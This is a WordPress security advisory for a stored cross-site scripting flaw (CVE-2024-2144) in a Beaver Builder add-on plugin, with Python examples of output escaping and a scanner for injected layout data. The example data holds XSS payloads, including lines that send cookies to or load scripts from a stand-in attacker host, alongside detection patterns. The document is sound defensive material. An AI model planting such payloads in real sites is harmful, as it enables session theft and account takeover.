Ultimate Addons for Beaver Builder – Lite Vulnerability – Authenticated (Contributor+) Stored Cross-Site Scripting via Image Separator Widget – CVE-2024-2144 | WordPress Plugin Vulnerability Report
Plugin Name: Ultimate Addons for Beaver Builder – Lite
Key Information:
- Software Type: Plugin
- Software Slug: ultimate-addons-for-beaver-builder-lite
- Software Status: Active
- Software Author: brainstormforce
- Software Downloads: 499,391
- Active Installs: 30,000
- Last Updated: April 1, 2024
- Patched Versions: 1.5.8
- Affected Versions: <= 1.5.7
Vulnerability Details:
- Name: Ultimate Addons for Beaver Builder – Lite <= 1.5.7
- Type: Authenticated (Contributor+) Stored Cross-Site Scripting
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- CVE: CVE-2024-2144
- CVSS Score: 6.4 (Medium)
- Publicly Published: March 29, 2024
- Researcher: Francesco Carlucci
- Description: The Ultimate Addons for Beaver Builder – Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Separator widget in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
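To make "insufficient input sanitization and output escaping" concrete, the following is an added illustration in Python and is not the plugin's code (the advisory does not show it). It renders a hypothetical image-separator widget from stored settings twice: once interpolating the values straight into markup, and once escaping each value for the context it lands in, with `esc_attr()` and `esc_url()` modelled on the WordPress functions of the same names. The setting names `image_url`, `alt_text` and `link_url`, and the malicious values, are assumptions for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed settings a contributor could save in a widget (hypothetical field names).
MALICIOUS_SETTINGS = {
    "image_url": "https://example.com/separator.png",
    "alt_text": '"><img src=x onerror=alert(document.cookie)>',
    "link_url": "javascript:alert(document.domain)",
}

# WordPress's esc_url() accepts a longer default list of schemes; this subset is enough here.
ALLOWED_SCHEMES = {"http", "https", "mailto", "tel"}


def render_unsafe(settings: dict) -> str:
    """Vulnerable pattern: settings interpolated straight into markup (illustration, not the plugin's code)."""
    return (
        f'<a href="{settings["link_url"]}">'
        f'<img class="image-separator" src="{settings["image_url"]}" alt="{settings["alt_text"]}">'
        "</a>"
    )


def esc_attr(value) -> str:
    """Approximates WordPress esc_attr(): entity-encode the characters that can close an attribute."""
    return html.escape(str(value), quote=True)


def esc_url(value) -> str:
    """Approximates WordPress esc_url(): drop URLs whose scheme is not allowlisted, then attribute-escape.

    Attribute escaping alone is not enough for href/src: "javascript:alert(1)" contains no
    special characters, so esc_attr() would pass it through unchanged.
    """
    value = str(value).strip()
    # Remove whitespace/control characters so "java\tscript:" is still recognised as the javascript scheme.
    compact = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    scheme = urlsplit(compact).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return ""
    return html.escape(compact, quote=True)


def render_safe(settings: dict) -> str:
    """Hardened pattern: every value escaped for the context it is written into."""
    return (
        f'<a href="{esc_url(settings["link_url"])}">'
        f'<img class="image-separator" src="{esc_url(settings["image_url"])}" '
        f'alt="{esc_attr(settings["alt_text"])}">'
        "</a>"
    )


if __name__ == "__main__":
    print(render_unsafe(MALICIOUS_SETTINGS))
    print(render_safe(MALICIOUS_SETTINGS))
```

The unsafe render emits a second `<img>` with an `onerror` handler and a `javascript:` link; the safe render keeps the alt text as inert entity-encoded text and blanks the link. Output escaping is the last line of defence; in a real plugin the same values should also be sanitized on save (for example with `wp_kses_post()` or `esc_url_raw()`) so that a payload never reaches the database in the first place.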
Summary:
The Ultimate Addons for Beaver Builder – Lite plugin for WordPress is vulnerable, in versions up to and including 1.5.7, to Stored Cross-Site Scripting via the Image Separator widget by authenticated users with contributor-level access or above. The vulnerability is patched in version 1.5.8.
Detailed Overview:
Francesco Carlucci discovered and reported the vulnerability. The issue is in the Image Separator widget: content entered into the widget's settings is neither sufficiently sanitized when the layout is saved nor escaped when the page is rendered, so a user with contributor-level access or above can store a script payload in a page. That payload executes in the browser of anyone who views the page. Because contributors cannot publish, a page they submit for review is typically opened by an editor or administrator, in whose session the script then runs with that user's privileges; this is what the scope-changed (S:C) component of the CVSS vector reflects, and it is why a Medium-scored, low-privilege stored XSS is still a realistic path to privilege escalation. The patch in version 1.5.8 is the remediation.
Advice for Users:
- Immediate Action: Update to version 1.5.8 or later. Until the update is applied, limit which user roles can use the page builder, and treat pages submitted by contributors as untrusted until their stored content has been reviewed.
- Check for Signs of Exploitation: Review Image Separator widgets added by contributor accounts, especially in pages pending review, drafts and revisions, and search the stored layout data for script tags, inline event handlers (for example onerror= or onload=) and javascript: URLs. Also review recently created or modified contributor accounts and any content changes you did not expect.
- Alternate Plugins: Consider alternative plugins with similar functionality as a precautionary measure.
- Stay Updated: Regularly update your plugins to the latest versions to mitigate the risks of vulnerabilities.
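As an added example of turning the "check for signs of exploitation" advice into a concrete check (this is not from the advisory or the vendor): Beaver Builder stores a page's layout as a PHP-serialized array in post meta, under the keys `_fl_builder_data` for the live layout and `_fl_builder_draft` for unpublished edits (verify the keys against your own database). The script below takes rows in the shape of `SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE meta_key IN ('_fl_builder_data', '_fl_builder_draft')`, here constructed inline with made-up fragments, and flags rows that carry script tags, inline event handlers or `javascript:` URLs after undoing the backslash and HTML-entity encodings that would otherwise hide them. The table prefix `wp_` and the row contents are assumptions.

```python
import html
import re

# Constructed rows in the shape of:
#   SELECT post_id, meta_key, meta_value FROM wp_postmeta
#   WHERE meta_key IN ('_fl_builder_data', '_fl_builder_draft');
# (table prefix assumed to be wp_). Real rows hold a complete PHP-serialized layout array;
# these fragments are made up and only mimic the parts a scanner cares about.
SAMPLE_ROWS = [
    (101, "_fl_builder_data",
     's:8:"alt_text";s:10:"Decorative";s:9:"image_url";s:28:"https://example.com/line.png";'),
    (102, "_fl_builder_data",
     's:8:"alt_text";s:46:""><img src=x onerror=alert(document.cookie)>";'),
    (103, "_fl_builder_draft",
     's:8:"link_url";s:42:"&#106;avascript:fetch(\'//evil.example/\'+document.cookie)";'),
    (104, "_fl_builder_data",
     's:8:"alt_text";s:31:"<svg/onload=import(\'//evil.example/x.js\')>";'),
]

# Ordered so the most specific signal is the one reported when several match.
INDICATORS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("svg-or-iframe", re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]{2,}\s*=", re.I)),
    ("javascript-url", re.compile(r"j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:", re.I)),
]


def normalize(value: str) -> str:
    """Undo encodings that hide a payload: JSON-style backslash escapes, then HTML entities, repeatedly."""
    cur = value.replace("\\/", "/").replace('\\"', '"')
    prev = None
    while prev != cur:
        prev, cur = cur, html.unescape(cur)
    return cur


def scan_rows(rows):
    """Return one (post_id, meta_key, indicator, excerpt) per row that looks like it carries a payload."""
    findings = []
    for post_id, meta_key, meta_value in rows:
        text = normalize(meta_value)
        for name, pattern in INDICATORS:
            match = pattern.search(text)
            if match:
                start = max(0, match.start() - 20)
                findings.append((post_id, meta_key, name, text[start:match.end() + 40]))
                break  # one hit is enough to queue the page for manual review
    return findings


if __name__ == "__main__":
    for post_id, meta_key, name, excerpt in scan_rows(SAMPLE_ROWS):
        print(f"post {post_id} ({meta_key}): {name}: ...{excerpt}...")
```

Run it against a real export by replacing `SAMPLE_ROWS` with the query result. The indicators are deliberately broad, so expect some false positives (legitimate embeds, custom HTML modules); every flagged post still needs a human look, and a hit in `_fl_builder_draft` matters as much as one in the live layout because drafts are what an editor opens when reviewing a contributor's work.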
Conclusion:
The swift action by the developers of Ultimate Addons for Beaver Builder – Lite to release a patch for this vulnerability highlights the importance of maintaining up-to-date software. Users are strongly advised to upgrade to version 1.5.8 or later to secure their WordPress installations against this and similar vulnerabilities.